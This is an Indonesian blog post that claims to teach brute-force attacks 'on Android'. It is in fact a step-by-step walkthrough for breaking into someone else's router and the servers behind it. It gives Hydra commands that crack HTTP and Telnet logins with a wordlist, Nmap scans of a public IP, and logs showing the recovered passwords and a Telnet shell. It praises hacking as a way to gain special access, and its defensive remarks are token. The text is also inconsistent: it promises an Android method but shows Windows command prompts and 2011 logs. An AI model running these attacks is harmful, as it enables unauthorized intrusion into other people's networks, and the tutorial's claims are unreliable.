Cara Menggunakan Brute Force di Android 2024
Minggu, 07 April 2024
Karena dengan ilmu hacking, maka Anda seolah-olah seperti mempunyai wewenang atau kekuasaan khusus ketimbang orang lain, contohnya, Anda bisa memiliki akses khusus untuk layanan VIP.
Walaupun terbilang sulit untuk memahami materinya, namun ilmu ini banyak dipelajari oleh hacker dan cracker.
Berbicara tentang ilmu hacking, ada beberapa teknik yang bisa dipelajari, salah satunya adalah Brute Force.
Istilah ini sering berkaitan dengan hacking sebuah server yang menaungi website atau jaringan tertentu.
Apa Itu Brute Force?
Brute Force sendiri adalah sebuah teknik hacking untuk meretas password sebuah server, jaringan, atau host, dengan cara mencoba seluruh kemungkinan kombinasi password yang ada pada wordlist atau “kamus password”.Cara atau metode ini dijamin akan berhasil menemukan password yang ingin diretas, tetapi menjalankan proses hack dengan metode ini membutuhkan banyak waktu.
Hal tersebut pastinya sesuai dengan prinsip kerja dari teknik ini, dimana hacker akan berusaha membobol password sebuah sistem dengan mencoba berbagai kombinasi password yang sudah tertulis di dalam “kamus” berupa wordlist.
Bila cara kerja dari teknik ini sudah dipahami, maka Anda akan menemukan jika teknik ini akan melakukan penyerangan dari bagian depan saja.
Tehnik brute force ini biasanya dijalankan pada perangkat PC, namun bisa juga di perangkat Android, tetapi akan ada sedikit perbedaan terkait langkah yang harus dilakukan.
Nah, berikut ini kami akan bagikan cara menggunakan brute force di Android yang bisa dipelajari dan diterapkan.
Faktor yang Mempengaruhi Keberhasilan dari Tehnik Brute Force
 |
| Faktor yang Mempengaruhi Keberhasilan dari Tehnik Brute Force |
Sebelum menggunakan tehnik brute force, ada baiknya agar Anda mengetahui faktor apa saja yang mempengaruhi keberhasilan dari tehnik tersebut jika dijalankan guys.
Berikut ini beberapa faktor yang mempengaruhi keberhasilan dari tehnik brute force terkait cara menggunakan brute force di Android yang perlu diketahui:
1. Menganggap Jika Password Diketik dalam Format Huruf Kecil
Faktor bisa mempengaruhi keberhasilan jika menerapkan tehnik ini adalah waktu yang dibutuhkan untuk melakukan brute force akan cenderung sama.Namun, jika salah satu atau beberapa karakter pada password mengandung huruf kapital (upper case), kemungkinan tehnik ini tidak akan berhasil.
2. Mencoba Semua Kemungkinan
Faktor kedua adalah tujuh karakter huruf kecil (lower case) pada password dibutuhkan kurang lebih 4 jam untuk bisa mendapatkan password.Namun, bila semua kemungkinan kombinasi antara karakter upper case & lower case Anda coba, maka membutuhkan waktu sekitar 23 hari untuk bisa mendapatkan password.
3. Metode Trade-Off
Bila Anda melakukan pencarian menggunakan kombinasi-kombinasi yang mungkin, seperti “password”, “PASSWORD” dan “Password”. Sedangkan kombinasi yang terdiri dari karakter yang rumit, seperti “pAssWOrD” kemungkinan tidak akan dimasukkan dalam proses.Karena dalam tehnik ini, lambatnya proses brute force bisa tertangani, namun ada kemungkinan password tidak ditemukan karena belum tentu password yang hendak dibobol terdiri dari kombinasi yang rumit.
Cara Menggunakan Brute Force di Android
 |
| Cara Menggunakan Brute Force di Android |
Setiap proses hack yang dilakukan, pastinya memiliki resiko atau dampak yang akan timbul, termasuk bila Anda menerapkan metode brute force ini.
Karena semua proses hack yang dilakukan dengan tujuan untuk membobol sistem keamanan milik orang lain tanpa izin, pastinya termasuk tindakan ilegal yang tidak dibenarkan.
Oleh karena itu, perhatikan serta pertimbangkan terlebih dahulu, tentang kemungkinan-kemungkinan resiko yang mungkin terjadi.
Sedangkan cara menggunakan brute force di Android seperti berikut ini:
- Untuk langkah pertama, ketahui terlebih dahulu IP router yang Anda gunakan, dengan cara menggunakan salah satu fungsi command prompt, yaitu sintaks “arp-a”. Misalnya router LAN 192.168.1.1 atau check IP public di checkmyip.com.
- Setelah alamat IP-nya didapatkan, silahkan akses alamat IP tersebut di browser.
- Selanjutnya, halaman login untuk membuka admin router pada browser akan Anda lihat.
- Cobalah untuk menjebol halaman login tersebut menggunakan username admin dan password admin. Bila tidak menunjukkan hasil yang bagus, maka Anda bisa memilih untuk terus maju atau tinggalkan target.
- Jika terus maju, maka Anda bisa menggunakan teknik brute force menggunakan perangkat lunak khusus hacking, Hydra.
- Kemudian masukan beberapa script di bawah ini pada Hydra:
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 180.254.70.135 login: admin password: basketball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
- Anda bisa mengetahui jika password untuk username “admin” adalah “basketball, dengan melihat contoh penggunaan Hydra saja. Maka sekarang Anda sudah berhasil masuk ke router dengan password yang didapat.
- Jika Anda ingin melakukan hacking server di belakang router (backdoor), maka lakukanlah proses IP Forwarding dari router ke server yang berada di belakang router.
- Karena Anda masih belum mengetahui IP-IP lokal berapa saja yang ada di belakang router, maka Anda harus mengujinya satu persatu dengan melakukan ping meskipun hal tersebut tidak menjadi jaminan cara ini akan berhasil.
- Adapun contoh pelaksanannya, misalnya Anda akan berasumsi jika alamat IP Server adalah 192.168.1.2. Setelah dilakukan ping menggunakan Command Prompt, maka didapati sintaks seperti di bawah ini:
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
- Setelah alamat IP Server berhasil di-ping, maka Anda bisa mencoba melakukan scanning port yang terbuka dengan NMAP di bawah ini:
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:2
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
- Berdasarkan hasil scanning dengan NMAP di atas, maka Anda mendapatkan adanya port yang terbuka selain port 80, yakni port 23 untuk telnet server. Dengan aktifnya port Telnet Server tersebut, maka Anda bisa melakukan teknik brute force melalui server Telnet dengan Hydra dan berikut ini sintaks yang harus dimasukkan:
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 180.254.70.135 login: administrator password: football
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26
- Dari sintaks di atas, Anda sudah mendapatkan password telnetnya, yaitu “football” dan bisa langsung dimasukkan untuk login menggunakan password yang sudah didapatkan. Sehingga Anda akan mendapatkan shell command dari Telnet Server.
Akhir Kata
Demikian cara yang bisa diterapkan, bila ingin menggunakan brute force di perangkat Android.Agar jaringan atau server terlindungi dari brute force yang akan dilakukan oleh orang lain, maka Anda harus tahu cara menjaga keamanan jaringan komputer, khususnya pada jaringan yang besar.
Karena dengan perlindungan dari brute force ini bisa Anda dapatkan jika pada jaringan komputer Anda terdapat firewall yang bermanfaat untuk menangkal serangan hacker atau cracker, termasuk mereka yang menggunakan teknik brute force.
Itulah seluruh isi artikel kami kali ini mengenai cara menggunakan brute force di Android. Semoga bermanfaat dan selamat mencoba.